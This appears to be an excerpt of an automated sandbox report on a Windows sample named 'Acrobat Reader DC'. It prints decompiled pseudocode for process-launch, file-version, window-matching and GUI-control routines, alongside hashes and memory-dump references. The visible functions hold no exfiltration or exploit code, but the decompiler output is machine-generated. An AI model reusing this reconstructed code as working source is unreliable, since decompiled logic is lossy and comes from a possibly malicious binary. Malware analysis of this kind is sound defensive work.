                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2173856841-3791954436
                                  • Opcode ID: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                  • Opcode Fuzzy Hash: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00433A13(short* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				unsigned int _v16;
				int _v20;
				int _v24;
				void* __edi;
				void* __esi;
				int _t39;
				int _t40;
				int _t42;
				int _t46;
				int _t61;
				int _t64;
				void* _t75;
				void* _t85;
				unsigned int _t86;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				int _t109;
				short* _t110;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t125;
				void* _t126;

				_t116 = _t115 - 0x14;
				_t101 = _a12;
				_t109 = GetFileVersionInfoSizeW(_a4,  &_v24);
				if(_t109 != 0) {
					_push(_t109);
					_t75 = E004115D7(_t101, _t109, __eflags);
					GetFileVersionInfoW(_a4, 0, _t109, _t75);
					_push( ~(0 | __eflags > 0x00000000) | (E004111C1(_t101) + 0x0000001a) * 0x00000002);
					_t110 = E004115D7(_t101, _t109, __eflags);
					E00411567(_t110, "\\");
					_t39 = E0041313C(_t101, "\\");
					_t118 = _t116 + 0x1c;
					__eflags = _t39;
					if(_t39 != 0) {
						E00411536(_t110, L"StringFileInfo\\");
						_t61 = E004134BD(_t101, "\\");
						_t125 = _t118 + 0x10;
						__eflags = _t61;
						if(_t61 != 0) {
							E00411536(_t110, _t101);
							_t118 = _t125 + 8;
						} else {
							_t64 = VerQueryValueW(_t75, L"\\VarFileInfo\\Translation",  &_v12,  &_v20);
							__eflags = _t64;
							if(_t64 == 0) {
								E00411536(_t110, L"04090000");
								_t126 = _t125 + 8;
							} else {
								_t14 =  &(_t110[0x10]); // 0x20
								_v16 =  *_v12;
								E00432E88( *_v12, 0, _t14, 4);
								_t17 =  &(_t110[0x14]); // 0x28
								E00432E88(_v16 >> 0x10, 0, _t17, 4);
								_t126 = _t125 + 0x20;
							}
							E00411536(_t110, "\\");
							E00411536(_t110, _t101);
							_t118 = _t126 + 0x10;
						}
					}
					_t40 = E004114AB(_t101, _t101, L"DefaultLangCodepage");
					__eflags = _t40;
					if(_t40 != 0) {
						_t42 = VerQueryValueW(_t75, _t110,  &_v8,  &_v20);
						__eflags = _t42;
						if(_t42 == 0) {
							_push(_t75);
							E004111DC();
							_push(_t110);
							E004111DC();
							__eflags = 0;
							return 0;
						} else {
							_t46 = E0041313C(_t101, "\\");
							__eflags = _t46;
							if(_t46 != 0) {
								_t103 = _a8;
								E00412FBA(_t103, _v8, 0x200);
								__eflags = 0;
								 *((short*)(_t103 + 0x400)) = 0;
							} else {
								_t85 = _v8;
								_t86 =  *(_t85 + 0xc);
								_push(_t86 & 0x0000ffff);
								_push(_t86 >> 0x10);
								_push( *(_t85 + 8) & 0x0000ffff);
								E0041329B(_a8, _a8, L"%u.%u.%u.%u",  *(_t85 + 8) >> 0x10);
							}
							_push(_t75);
							E004111DC();
							_push(_t110);
							E004111DC();
							return 1;
						}
					} else {
						_t105 = _a8;
						_t19 =  &(_t110[0x10]); // 0x20
						E00412FBA(_t105, _t19, 8);
						__eflags = 0;
						_push(_t75);
						 *((short*)(_t105 + 0x10)) = 0;
						E004111DC();
						_push(_t110);
						E004111DC();
						return 1;
					}
				} else {
					return 0;
				}
			}





























                                  0x00433a19
                                  0x00433a1e
                                  0x00433a2c
                                  0x00433a30
                                  0x00433a3b
                                  0x00433a47
                                  0x00433a4e
                                  0x00433a6d
                                  0x00433a73
                                  0x00433a7b
                                  0x00433a86
                                  0x00433a8b
                                  0x00433a8e
                                  0x00433a90
                                  0x00433a9c
                                  0x00433aa7
                                  0x00433aac
                                  0x00433aaf
                                  0x00433ab1
                                  0x00433b21
                                  0x00433b26
                                  0x00433ab3
                                  0x00433ac1
                                  0x00433ac7
                                  0x00433ac9
                                  0x00433b00
                                  0x00433b05
                                  0x00433acb
                                  0x00433ad2
                                  0x00433ad9
                                  0x00433adc
                                  0x00433ae6
                                  0x00433af0
                                  0x00433af5
                                  0x00433af5
                                  0x00433b0e
                                  0x00433b15
                                  0x00433b1a
                                  0x00433b1a
                                  0x00433ab1
                                  0x00433b2f
                                  0x00433b37
                                  0x00433b39
                                  0x00433b72
                                  0x00433b78
                                  0x00433b7a
                                  0x00433bf0
                                  0x00433bf1
                                  0x00433bf6
                                  0x00433bf7
                                  0x00433c01
                                  0x00433c07
                                  0x00433b7c
                                  0x00433b82
                                  0x00433b8a
                                  0x00433b8c
                                  0x00433bbd
                                  0x00433bc7
                                  0x00433bcf
                                  0x00433bd1
                                  0x00433b8e
                                  0x00433b8e
                                  0x00433b94
                                  0x00433b9a
                                  0x00433ba1
                                  0x00433ba5
                                  0x00433bb0
                                  0x00433bb5
                                  0x00433bd8
                                  0x00433bd9
                                  0x00433bde
                                  0x00433bdf
                                  0x00433bef
                                  0x00433bef
                                  0x00433b3b
                                  0x00433b3b
                                  0x00433b40
                                  0x00433b45
                                  0x00433b4a
                                  0x00433b4c
                                  0x00433b4d
                                  0x00433b51
                                  0x00433b56
                                  0x00433b57
                                  0x00433b67
                                  0x00433b67
                                  0x00433a32
                                  0x00433a39
                                  0x00433a39

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 1503153545-1459072770
                                  • Opcode ID: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00469296(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v24;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t39;
				char* _t53;
				void* _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t77;

				_t77 = __fp0;
				_t61 = __edx;
				E0040BC70( &_v24, __eflags);
				_t58 =  &_v40;
				E0040BC70( &_v40, __eflags);
				_t64 = _a4;
				if(E00436565(_t64) != 0 || E004114AB(_t62,  *_t64, L"LAST") == 0) {
					_t53 = L"[LAST";
					goto L14;
				} else {
					if(E004114AB(_t62,  *_t64, L"ACTIVE") != 0) {
						_t33 = E0041341F( *_t64, L"HANDLE=", 7);
						__eflags = _t33;
						if(_t33 != 0) {
							_t35 = E0041341F( *_t64, L"REGEXP=", 7);
							__eflags = _t35;
							if(_t35 != 0) {
								_t37 = E0041341F( *_t64, L"CLASSNAME=", 0xa);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 = E004114AB(_t62,  *_t64, L"ALL");
									__eflags = _t39;
									if(_t39 == 0) {
										_t53 = L"[ALL";
										goto L14;
									}
								} else {
									E00402160( &_v24, L"[CLASS:", _t61, _t62);
									_push(0xffffffff);
									_push(0xa);
									goto L10;
								}
							} else {
								E00402160( &_v24, L"[REGEXPTITLE:", _t61, _t62);
								_push(0xffffffff);
								_push(7);
								goto L10;
							}
						} else {
							E00402160( &_v24, L"[HANDLE:", _t61, _t62);
							_push(0xffffffff);
							_push(7);
							L10:
							_push( &_v56);
							_push(_t64);
							E0040E0A0( &_v40, E0046150F(__eflags));
							_t58 =  &_v56;
							E00402250( &_v56);
							E00461321(__eflags, _t77,  &_v40);
							E0040BD50( &_v24, _t77,  &_v40);
							_t64 = _a4;
							goto L15;
						}
					} else {
						_t53 = L"[ACTIVE";
						L14:
						E00402160( &_v24, _t53, _t61, _t62);
						L15:
						E0040D200( &_v24, _t58, "]", _t77);
						E0040E0A0(_t64,  &_v24);
					}
				}
				E00402250( &_v40);
				return E00402250( &_v24);
			}


















                                  0x00469296
                                  0x00469296
                                  0x004692a2
                                  0x004692a7
                                  0x004692aa
                                  0x004692af
                                  0x004692ba
                                  0x004693b9
                                  0x00000000
                                  0x004692d8
                                  0x004692ea
                                  0x00469300
                                  0x00469308
                                  0x0046930a
                                  0x00469329
                                  0x00469331
                                  0x00469333
                                  0x00469352
                                  0x0046935a
                                  0x0046935c
                                  0x004693a6
                                  0x004693ae
                                  0x004693b0
                                  0x004693b2
                                  0x00000000
                                  0x004693b2
                                  0x0046935e
                                  0x00469366
                                  0x0046936b
                                  0x0046936d
                                  0x00000000
                                  0x0046936d
                                  0x00469335
                                  0x0046933d
                                  0x00469342
                                  0x00469344
                                  0x00000000
                                  0x00469344
                                  0x0046930c
                                  0x00469314
                                  0x00469319
                                  0x0046931b
                                  0x0046936f
                                  0x00469372
                                  0x00469373
                                  0x0046937d
                                  0x00469382
                                  0x00469385
                                  0x0046938b
                                  0x00469394
                                  0x00469399
                                  0x00000000
                                  0x00469399
                                  0x004692ec
                                  0x004692ec
                                  0x004693be
                                  0x004693c1
                                  0x004693c6
                                  0x004693ce
                                  0x004693d7
                                  0x004693d7
                                  0x004692ea
                                  0x004693df
                                  0x004693f2

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0044870C(void* __eflags, intOrPtr _a4, signed int _a8) {
				int _v20;
				void* _v28;
				intOrPtr _v56;
				int _v60;
				long _v64;
				void* _v68;
				int _v100;
				signed int _v104;
				long _v108;
				int _v112;
				void* _v116;
				signed int _v120;
				struct HWND__** _v124;
				struct HWND__* _v128;
				signed char _v132;
				signed int _v133;
				signed int _v140;
				int _v148;
				intOrPtr _t172;
				signed int _t176;
				void* _t178;
				signed char _t179;
				signed char _t181;
				signed int _t198;
				signed char _t199;
				signed char _t201;
				int _t209;
				signed int _t212;
				struct HWND__* _t215;
				signed int _t221;
				struct HWND__* _t226;
				intOrPtr* _t229;

				_t198 = _a8;
				if(E00441AF5(0x4a8630, _a4,  &_v120,  &_v132) != 0) {
					_t172 =  *0x4a8690; // 0x0
					_t209 =  *0x4a86a4; // 0xa71980
					_t224 = _v132;
					_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t209 + _v132 * 4))));
					_v124 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + _v120 * 4))));
					_v128 =  *_t229;
					_v133 =  *((intOrPtr*)(_t229 + 0x88));
					_v140 = 0;
					if(_t198 < 0) {
						_t198 = 0;
					}
					_t176 = _t198 & 0x00000100;
					_v132 = _t176;
					if(_t176 != 0) {
						E004415D1(_v120, _t224);
						_v148 = 1;
					}
					if((_t198 & 0x00000800) != 0) {
						SetWindowPos(_v128, 0, 0, 0, 0, 0, 0x13);
						_v140 = 1;
					}
					_t178 = (_v133 & 0x000000ff) + 0xfffffff7;
					if(_t178 > 0x11) {
						L62:
						_t199 = _t198 & 0x000010f8;
						_t179 = _t199;
						_v132 = _t179;
						if(_t199 > 0) {
							_t226 = _v128;
							_t201 = 0;
							_v140 = 1;
							if(_t179 < 0) {
								_t201 = 0xc0;
								EnableWindow(_t226, 0);
								_t179 = _v132;
							}
							if((_t179 & 0x00000040) != 0) {
								_t201 = 0xc0;
								EnableWindow(_t226, 1);
								_t179 = _v132;
							}
							_t221 = _t179 & 0x00000020;
							if(_t221 != 0) {
								_t201 = _t201 + 0x30;
							}
							_t212 = _t179 & 0x00000010;
							_v132 = _t212;
							if(_t212 != 0) {
								_t201 = _t201 + 0x30;
							}
							if((_t179 & 0x00000008) != 0) {
								_t201 = _t201 + 0x1008;
							}
							if((_t179 & 0x00001000) != 0) {
								_t201 = _t201 + 0x1008;
							}
							_t181 =  *((intOrPtr*)(_t229 + 0x8b));
							 *(_t229 + 0x8a) =  !_t201 &  *(_t229 + 0x8a) | _t179;
							if(_t181 == 0xff) {
								L78:
								if(_t221 != 0) {
									ShowWindow(_t226, 0);
								}
								if(_v132 != 0) {
									ShowWindow(_t226, 4);
									if(_v133 == 0x1a && ( *(_t229 + 0x8a) & 0x00000040) != 0) {
										EnableWindow(_t226, 1);
									}
								}
								E00430B87(_v124, _t229, 1);
							} else {
								_t215 = _v124[0x65];
								if((_t181 & 0x000000ff) == _t215 || _t215 == 0xffffffff) {
									goto L78;
								}
							}
						}
						goto L85;
					} else {
						switch( *((intOrPtr*)(( *(_t178 + 0x448d50) & 0x000000ff) * 4 +  &M00448D24))) {
							case 0:
								__eax = __ebx & 0x00000007;
								if(__eax == 0) {
									__ecx = _v128;
									_push(0);
									_push(0);
									_push(0x466);
									_push(_v128);
									goto L60;
								} else {
									if(__eax == 0) {
										__eax = _v128;
										_push(0xffff0000);
										_push(0xffffffff);
										_push(0x465);
										_push(_v128);
										L60:
										if(SendMessageW() != 0) {
											goto L61;
										}
									} else {
										__edx = _v128;
										__eax = SendMessageW(_v128, 0x467, 0, 0);
										goto L61;
									}
								}
								goto L62;
							case 1:
								if((__bl & 0x00000010) != 0) {
									__ecx = _v124;
									__eax =  *(__esi + 0x8b) & 0x000000ff;
									if( *((char*)(__ecx + 0x19c)) != 0) {
										__edx =  *(__ecx + 0x198);
										 *(__ecx + 0x194) =  *(__ecx + 0x198);
									}
									__edi = __ecx;
									__eax =  *(__esi + 0x8b) & 0x000000ff;
									 *(__edi + 0x198) =  *(__esi + 0x8b) & 0x000000ff;
									goto L61;
								}
								goto L62;
							case 2:
								goto L1;
							case 3:
								__ecx =  *(__esi + 8);
								__eax =  &_v116;
								_v140 = 0;
								_v116 = 0x30;
								_v112 = 1;
								if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) == 0 || (__bl & 0x00000020) != 0) {
									goto L1;
								} else {
									if(__bl < 0) {
										_v140 = 3;
									}
									if((__bl & 0x00000001) != 0) {
										_v140 = _v140 | 0x00000008;
									}
									if(_v132 != 0) {
										_v140 = _v140 | 0x00000080;
									}
									if((_v104 & 0x00000008) != 0 && (__bl & 0x00000004) == 0) {
										_v140 = _v140 | 0x00000008;
									}
									__ecx =  *(__esi + 8);
									__edx = _v140;
									__eax =  &_v116;
									_v104 = _v140;
									__eax = SetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116);
									if((__ebx & 0x00000200) == 0) {
										__ecx =  *(__esi + 8);
										__eax =  &_v116;
										if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) != 0 && (_v104 & 0x00001000) != 0) {
											_push(0);
											_push(0xffffffff);
											goto L51;
										}
									} else {
										_push(0);
										_push(__edi);
										L51:
										__edx =  *(__esi + 8);
										__eax = SetMenuDefaultItem( *(__esi + 8), ??, ??);
									}
									__eax = _v124;
									__ecx =  *_v124;
									__eax = DrawMenuBar( *_v124);
									goto L61;
								}
								goto L97;
							case 4:
								__ecx =  *(__esi + 0x30);
								__eax = GetWindowLongW( *(__esi + 0x30), 0xfffffff0);
								__edx =  *(__esi + 0xc);
								__bl = __bl & 0x00000001;
								__bl & 0x00000001 =  ~(__bl & 0x00000001);
								asm("sbb eax, eax");
								__eax =  ~(__bl & 0x00000001) & 0x00001000;
								__eax = ( ~(__bl & 0x00000001) & 0x00001000) + 0x1000;
								_v64 =  *(__esi + 0xc);
								_v68 = 8;
								_v56 = 0xf010;
								_v60 = __eax;
								if((__ebx & 0x00000200) != 0) {
									_v60 = __eax;
								}
								__edx =  *(__esi + 0x30);
								__edi = SendMessageW;
								__ecx =  &_v68;
								__eax = SendMessageW( *(__esi + 0x30), 0x113f, 0,  &_v68);
								if((__ebx & 0x00000400) != 0) {
									__eax =  *(__esi + 0xc);
									__ecx =  *(__esi + 0x30);
									__eax = SendMessageW( *(__esi + 0x30), 0x1102, 2,  *(__esi + 0xc));
								}
								if(_v132 != 0) {
									__edx =  *(__esi + 0x30);
									E00441B7C(0x4a8630,  *(__esi + 0x30)) = _v128;
									__eax = E004415D1(_v128, _v128);
									__ecx =  *(__esi + 0xc);
									__edx =  *(__esi + 0x30);
									__eax = SendMessageW( *(__esi + 0x30), 0x110b, 9,  *(__esi + 0xc));
								}
								goto L61;
							case 5:
								__esi =  *(__esi + 0x30);
								__edx =  &_v28;
								_v140 = 0;
								_v28 = 1;
								_v20 = __edi;
								__edi = SendMessageW(__esi, 0x1053, 0xffffffff,  &_v28);
								if(__edi == 0xffffffff) {
									goto L1;
								} else {
									_v112 = __edi;
									_v108 = 0;
									_v116 = 8;
									__eax = GetWindowLongW(__esi, 0xffffffec);
									if((__al & 0x00000004) != 0 && (__bl & 0x00000005) != 0) {
										__ebx - 1 =  ~(__ebx - 1);
										__ecx =  &_v116;
										asm("sbb eax, eax");
										 ~(__ebx - 1) & 0xfffff000 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
										_v100 = 0xf000;
										_v104 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
										_v140 = SendMessageW(__esi, 0x104c, 0,  &_v116);
									}
									if((__ebx & 0x00002100) == 0) {
										L85:
										return _v140;
									} else {
										if(_v132 != 0) {
											_v104 = 0xffffffff;
										}
										if((__ebx & 0x00002000) != 0) {
											_v104 = 0;
										}
										__edx =  &_v116;
										_v100 = 3;
										__eax = SendMessageW(__esi, 0x102b, __edi,  &_v116);
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								}
								goto L97;
							case 6:
								__eax = 3;
								if( *0x4a86b4 >= 3) {
									do {
										__ecx =  *0x4a86a4;
										__ecx =  *( *0x4a86a4 + __eax * 4);
										if( *__ecx == 0) {
											goto L20;
										} else {
											__ecx =  *__ecx;
											__edx =  *(__ecx + 4);
											__edi = _v124;
											if( *(__ecx + 4) != _v124[1] ||  *((char*)(__ecx + 0x88)) != 3 || __ecx !=  *(__esi + 0x30)) {
												goto L20;
											} else {
												__cl =  *((intOrPtr*)(__esi + 0x8a));
												if((__bl & __cl) == 0 && (__cl & 0x00000010) != 0) {
													__edx =  *0x4a86a4;
													__eax =  *( *0x4a86a4 + __eax * 4);
													__eax =  *__eax;
													__ecx =  *(__eax + 0x86);
													__edx =  *(__eax + 0x84);
													__ecx =  *((short*)(__eax + 0x82));
													__edx =  *((short*)(__eax + 0x80));
													__eax = MoveWindow(__eax, __edx, __ecx,  *(__eax + 0x84),  *(__eax + 0x86), 0);
													__ecx =  *(__esi + 0x30);
													__edx = _v128;
													__eax = SendMessageW(_v128, 0x469,  *(__esi + 0x30), 0);
												}
											}
										}
										goto L62;
										L20:
										__eax = __eax + 1;
									} while (__eax <=  *0x4a86b4);
								}
								goto L62;
							case 7:
								if((__ebx & 0x00000200) != 0) {
									__edx = _v124;
									 *_v124 = SendMessageW( *_v124, 0x401, __edi, 0);
									if(GetFocus() == __esi->i) {
										__ecx = _v120;
										__eax = E004415D1(_v120, __edi);
									}
									goto L61;
								}
								goto L62;
							case 8:
								__eax = __ebx;
								__eax = __ebx & 0x00000007;
								if(__eax != 0) {
									__edx = _v128;
									__eax = SendMessageW(_v128, 0xf1, __eax, 0);
									goto L61;
								}
								goto L62;
							case 9:
								_t190 = _t198 & 0x00000007;
								if((_t198 & 0x00000007) != 0) {
									E00440D98(_t224, _t190 & 0x00000003);
									L61:
									_v140 = 1;
								}
								goto L62;
							case 0xa:
								goto L62;
						}
					}
				} else {
					L1:
					return 0;
				}
				L97:
			}



































                                  0x0044871c
                                  0x00448738
                                  0x00448745
                                  0x00448753
                                  0x00448759
                                  0x00448760
                                  0x00448768
                                  0x0044876e
                                  0x00448772
                                  0x00448776
                                  0x00448780
                                  0x00448782
                                  0x00448782
                                  0x00448786
                                  0x0044878b
                                  0x0044878f
                                  0x00448797
                                  0x0044879c
                                  0x0044879c
                                  0x004487aa
                                  0x004487bd
                                  0x004487c3
                                  0x004487c3
                                  0x004487d0
                                  0x004487d6
                                  0x00448b30
                                  0x00448b30
                                  0x00448b36
                                  0x00448b38
                                  0x00448b3c
                                  0x00448b42
                                  0x00448b46
                                  0x00448b48
                                  0x00448b52
                                  0x00448b57
                                  0x00448b5c
                                  0x00448b62
                                  0x00448b62
                                  0x00448b68
                                  0x00448b6d
                                  0x00448b72
                                  0x00448b78
                                  0x00448b78
                                  0x00448b7e
                                  0x00448b81
                                  0x00448b83
                                  0x00448b83
                                  0x00448b88
                                  0x00448b8b
                                  0x00448b8f
                                  0x00448b91
                                  0x00448b91
                                  0x00448b96
                                  0x00448b98
                                  0x00448b98
                                  0x00448ba3
                                  0x00448ba5
                                  0x00448ba5
                                  0x00448bb5
                                  0x00448bbb
                                  0x00448bc3
                                  0x00448bdb
                                  0x00448be3
                                  0x00448be8
                                  0x00448be8
                                  0x00448bef
                                  0x00448bf4
                                  0x00448bfb
                                  0x00448c09
                                  0x00448c09
                                  0x00448bfb
                                  0x00448c17
                                  0x00448bc5
                                  0x00448bc9
                                  0x00448bd4
                                  0x00000000
                                  0x00000000
                                  0x00448bd4
                                  0x00448bc3
                                  0x00000000
                                  0x004487dc
                                  0x004487e3
                                  0x00000000
                                  0x00448aeb
                                  0x00448aee
                                  0x00448c29
                                  0x00448c2d
                                  0x00448c2f
                                  0x00448c31
                                  0x00448c36
                                  0x00000000
                                  0x00448af4
                                  0x00448af5
                                  0x00448b0d
                                  0x00448b11
                                  0x00448b16
                                  0x00448b18
                                  0x00448b1d
                                  0x00448b1e
                                  0x00448b26
                                  0x00000000
                                  0x00000000
                                  0x00448af7
                                  0x00448af7
                                  0x00448b05
                                  0x00000000
                                  0x00448b05
                                  0x00448af5
                                  0x00000000
                                  0x00000000
                                  0x004488e1
                                  0x004488e7
                                  0x004488f2
                                  0x004488f9
                                  0x004488fb
                                  0x00448901
                                  0x00448901
                                  0x00448908
                                  0x00448915
                                  0x0044891c
                                  0x00000000
                                  0x0044891c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004489dd
                                  0x004489e0
                                  0x004489e9
                                  0x004489f1
                                  0x004489f9
                                  0x00448a09
                                  0x00000000
                                  0x00448a18
                                  0x00448a1a
                                  0x00448a1c
                                  0x00448a1c
                                  0x00448a27
                                  0x00448a29
                                  0x00448a29
                                  0x00448a33
                                  0x00448a35
                                  0x00448a35
                                  0x00448a42
                                  0x00448a49
                                  0x00448a49
                                  0x00448a4e
                                  0x00448a51
                                  0x00448a55
                                  0x00448a5e
                                  0x00448a62
                                  0x00448a6e
                                  0x00448a75
                                  0x00448a78
                                  0x00448a89
                                  0x00448a95
                                  0x00448a97
                                  0x00000000
                                  0x00448a97
                                  0x00448a70
                                  0x00448a70
                                  0x00448a72
                                  0x00448a99
                                  0x00448a99
                                  0x00448a9d
                                  0x00448a9d
                                  0x00448aa3
                                  0x00448aa7
                                  0x00448aaa
                                  0x00000000
                                  0x00448aaa
                                  0x00000000
                                  0x00000000
                                  0x00448927
                                  0x0044892d
                                  0x00448933
                                  0x00448938
                                  0x0044893d
                                  0x0044893f
                                  0x00448941
                                  0x00448946
                                  0x0044894b
                                  0x0044894f
                                  0x00448957
                                  0x0044895f
                                  0x00448969
                                  0x0044896e
                                  0x0044896e
                                  0x00448972
                                  0x00448975
                                  0x0044897b
                                  0x00448988
                                  0x00448990
                                  0x00448992
                                  0x00448995
                                  0x004489a1
                                  0x004489a1
                                  0x004489a8
                                  0x004489ae
                                  0x004489bd
                                  0x004489c2
                                  0x004489c7
                                  0x004489ca
                                  0x004489d6
                                  0x004489d6
                                  0x00000000
                                  0x00000000
                                  0x00448c3c
                                  0x00448c3f
                                  0x00448c4f
                                  0x00448c57
                                  0x00448c62
                                  0x00448c6f
                                  0x00448c74
                                  0x00000000
                                  0x00448c7a
                                  0x00448c7d
                                  0x00448c81
                                  0x00448c89
                                  0x00448c91
                                  0x00448c99
                                  0x00448ca3
                                  0x00448ca5
                                  0x00448caa
                                  0x00448cb8
                                  0x00448cbe
                                  0x00448cc6
                                  0x00448cd0
                                  0x00448cd0
                                  0x00448cda
                                  0x00448c1c
                                  0x00448c26
                                  0x00448ce0
                                  0x00448ce5
                                  0x00448ce7
                                  0x00448ce7
                                  0x00448cf5
                                  0x00448cf7
                                  0x00448cf7
                                  0x00448cff
                                  0x00448d0b
                                  0x00448d13
                                  0x00448d19
                                  0x00448d1a
                                  0x00448d1b
                                  0x00448d1f
